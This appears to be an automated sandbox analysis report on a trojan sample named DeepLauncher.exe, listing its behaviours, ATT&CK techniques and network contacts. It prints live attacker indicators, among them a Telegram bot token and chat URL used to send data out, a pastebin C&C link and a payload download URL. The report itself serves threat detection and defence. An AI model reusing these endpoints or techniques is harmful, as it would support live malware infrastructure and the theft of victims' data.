Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: DeepLauncher.exe, 00000000.00000003.1795675532.00000233CD6D9000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000003.1738079879.00000233CD6CA000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000003.1736460643.00000233CD72C000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000003.1795675532.00000233CD72C000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000003.1736460643.00000233CD692000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000003.1734769390.00000233CD642000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\DeepLauncher.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Windows Management Instrumentation		1
DLL Side-Loading		111
Process Injection		1
Masquerading		OS Credential Dumping1
Query Registry		Remote ServicesData from Local System2
Web Service		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
Command and Scripting Interpreter		Boot or Logon Initialization Scripts1
DLL Side-Loading		11
Disable or Modify Tools		LSASS Memory21
Security Software Discovery		Remote Desktop ProtocolData from Removable Media1
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
PowerShell		Logon Script (Windows)Logon Script (Windows)31
Virtualization/Sandbox Evasion		Security Account Manager1
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive3
Ingress Tool Transfer		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
Process Injection		NTDS31
Virtualization/Sandbox Evasion		Distributed Component Object ModelInput Capture4
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information		LSA Secrets1
Application Window Discovery		SSHKeylogging15
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials1
System Network Configuration Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync12
System Information Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1617346 Sample: DeepLauncher.exe Startdate: 17/02/2025 Architecture: WINDOWS Score: 100 41 pastebin.com 2->41 43 api.telegram.org 2->43 45 3 other IPs or domains 2->45 55 Suricata IDS alerts for network traffic 2->55 57 Antivirus detection for URL or domain 2->57 59 Multi AV Scanner detection for submitted file 2->59 65 4 other signatures 2->65 9 DeepLauncher.exe 15 2->9         started        signatures3 61 Connects to a pastebin service (likely for C&C) 41->61 63 Uses the Telegram API (likely for C&C communication) 43->63 process4 dnsIp5 47 72.5.43.195, 49912, 80 UNASSIGNED United States 9->47 49 ip-api.com 208.95.112.1, 49886, 80 TUT-ASUS United States 9->49 51 2 other IPs or domains 9->51 67 Bypasses PowerShell execution policy 9->67 69 Adds a directory exclusion to Windows Defender 9->69 13 powershell.exe 14 24 9->13         started        18 powershell.exe 23 9->18         started        20 powershell.exe 9->20         started        22 powershell.exe 9->22         started        signatures6 process7 dnsIp8 53 pastebin.com 104.20.3.235, 443, 49705 CLOUDFLARENETUS United States 13->53 39 C:\Users\user\AppData\...\ued2riov.cmdline, Unicode 13->39 dropped 71 Writes to foreign memory regions 13->71 24 csc.exe 3 13->24         started        27 conhost.exe 13->27         started        73 Loading BitLocker PowerShell Module 18->73 29 conhost.exe 18->29         started        31 conhost.exe 20->31         started        33 conhost.exe 22->33         started        file9 signatures10 process11 file12 37 C:\Users\user\AppData\Local\...\ued2riov.dll, PE32 24->37 dropped 35 cvtres.exe 1 24->35         started        process13

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
DeepLauncher.exe16%VirustotalBrowse
DeepLauncher.exe24%ReversingLabsWin64.Trojan.Generic

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://www.microsoft.co50%Avira URL Cloudsafe
http://schemas.dataconX0%Avira URL Cloudsafe
https://gunaframework.com/api/licensing.phpPe0%Avira URL Cloudsafe
http://schemas.datacontract.org/2004/07/NETdesign.Plugin.Notifer80%Avira URL Cloudsafe
http://ns.adobe.c.0/ti0%Avira URL Cloudsafe
http://72.5.43.195:80/8100%Avira URL Cloudmalware
http://ns.dob0%Avira URL Cloudsafe
http://api.ipify.org00%Avira URL Cloudsafe
http://72.5.43.195/Music.exe:100%Avira URL Cloudmalware
https://gunaui.com/pricing0%Avira URL Cloudsafe
http://api.ipify.orgnotification_sent.flag0%Avira URL Cloudsafe
http://schemas.datacontract.org/2004/07/NETdesign.Plugin.Notifer0%Avira URL Cloudsafe
http://72.5.43.195/Music.exe100%Avira URL Cloudmalware

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
api.ipify.org
104.26.12.205
truefalse
    		high
    ip-api.com
    		208.95.112.1
    		truefalse
      		high
      api.telegram.org
      		149.154.167.220
      		truefalse
        		high
        pastebin.com
        		104.20.3.235
        		truefalse
          		high
          206.23.85.13.in-addr.arpa
          		unknown
          		unknownfalse
            		high

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            https://api.telegram.org/bot7996264390:AAGcousd9x1F2KPKs4fpu1cdEMk88F3jG7I/sendPhoto?chat_id=5829712415false
              		high
              https://api.telegram.org/bot7996264390:AAGcousd9x1F2KPKs4fpu1cdEMk88F3jG7I/sendMessagefalse
                		high
                https://pastebin.com/raw/WHKzW2nrfalse
                  		high

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://html4/loose.dtdDeepLauncher.exefalse
                    		high
                    http://ns.adobe.hotoshDeepLauncher.exe, 00000000.00000003.1662967255.00000233C8ABB000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000003.1663054490.00000233C8AD1000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005DeepLauncher.exe, 00000000.00000002.2566056535.00000233C5420000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2565964975.00000233C53F1000.00000020.00001000.00020000.00000000.sdmpfalse
                        		high
                        https://gunaframework.com/api/licensing.phpPeDeepLauncher.exe, 00000000.00000002.2563696431.000001F332820000.00000004.00001000.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://ns.adobe.c.0/tiDeepLauncher.exe, 00000000.00000003.1662967255.00000233C8ABB000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000003.1663054490.00000233C8AD1000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://ns.photo/DeepLauncher.exe, 00000000.00000003.1662967255.00000233C8ABB000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000003.1663054490.00000233C8AD1000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://ns.a.0/sTyDeepLauncher.exe, 00000000.00000003.1662967255.00000233C8ABB000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000003.1663054490.00000233C8AD1000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://api.telegram.org/botDeepLauncher.exe, 00000000.00000002.2563983126.000001F3330C9000.00000004.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563696431.000001F332820000.00000004.00001000.00020000.00000000.sdmpfalse
                              		high
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200DeepLauncher.exe, 00000000.00000002.2566056535.00000233C5420000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2565964975.00000233C53F1000.00000020.00001000.00020000.00000000.sdmpfalse
                                		high
                                https://aka.ms/dotnet/infoDeepLauncher.exefalse
                                  		high
                                  https://aka.ms/winforms-warnings/DeepLauncher.exe, 00000000.00000002.2569211926.00000233C71A6000.00000004.10000000.00040000.00000000.sdmpfalse
                                    		high
                                    http://www.micom/pkiops/Docs/ry.htm0powershell.exe, 00000006.00000002.1522901895.00000220C9EFE000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.microsoft.copowershell.exe, 00000006.00000002.1531770760.00000220C9FA0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1534008835.00000220CA137000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://contoso.com/Licensepowershell.exe, 0000000E.00000002.1817076970.00000174BB37F000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://schemas.datacontract.org/2004/07/NETdesign.Plugin.Notifer8DeepLauncher.exe, 00000000.00000002.2563983126.000001F333098000.00000004.00001000.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.microsoft.co5powershell.exe, 00000006.00000002.1531770760.00000220C9FA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://aka.ms/dotnet/app-launch-failedDeepLauncher.exefalse
                                            		high
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovinceDeepLauncher.exe, 00000000.00000002.2566056535.00000233C5420000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2565964975.00000233C53F1000.00000020.00001000.00020000.00000000.sdmpfalse
                                              		high
                                              http://schemas.dataconXDeepLauncher.exe, 00000000.00000002.2563983126.000001F333098000.00000004.00001000.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://.cssDeepLauncher.exefalse
                                                		high
                                                http://ns.dobDeepLauncher.exe, 00000000.00000003.1662967255.00000233C8ABB000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000003.1663054490.00000233C8AD1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20DeepLauncher.exe, 00000000.00000002.2566056535.00000233C5420000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2565964975.00000233C53F1000.00000020.00001000.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://aka.ms/dotnet-core-applaunch?DeepLauncher.exefalse
                                                    		high
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authenticationDeepLauncher.exe, 00000000.00000002.2566056535.00000233C5420000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2565964975.00000233C53F1000.00000020.00001000.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://github.com/dotnet/runtimeDeepLauncher.exe, 00000000.00000002.2562350709.000001F32EEB1000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563165264.000001F330741000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566798798.00000233C5A18000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562497945.000001F32EEF0000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566297559.00000233C5531000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566972555.00000233C5C73000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563012536.000001F330710000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562423615.000001F32EED1000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562816385.000001F3306E0000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566798798.00000233C5A10000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562578727.000001F32EF01000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562970930.000001F330701000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566056535.00000233C5420000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566373042.00000233C5571000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563393856.000001F330790000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566027392.00000233C5400000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562892333.000001F3306F1000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562792361.000001F3306D1000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563277960.000001F330771000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563203699.000001F330760000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562624925.000001F32EF10000.00000004.10000000.00040000.00000000.sdmpfalse
                                                        		high
                                                        https://api.telegram.org/bot/sendPhoto?chat_id=DeepLauncher.exe, 00000000.00000002.2563983126.000001F33303A000.00000004.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563696431.000001F332820000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidDeepLauncher.exe, 00000000.00000002.2566297559.00000233C5531000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566056535.00000233C5420000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566027392.00000233C5400000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2565964975.00000233C53F1000.00000020.00001000.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://aka.ms/dotnet-warnings/DeepLauncher.exe, 00000000.00000002.2566972555.00000233C5C73000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563012536.000001F330710000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566107474.00000233C5430000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2567540441.00000233C5FA0000.00000004.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566798798.00000233C5A10000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562578727.000001F32EF01000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562970930.000001F330701000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566798798.00000233C5A1F000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566056535.00000233C5420000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566027392.00000233C5400000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562892333.000001F3306F1000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563203699.000001F330760000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562624925.000001F32EF10000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2565964975.00000233C53F1000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 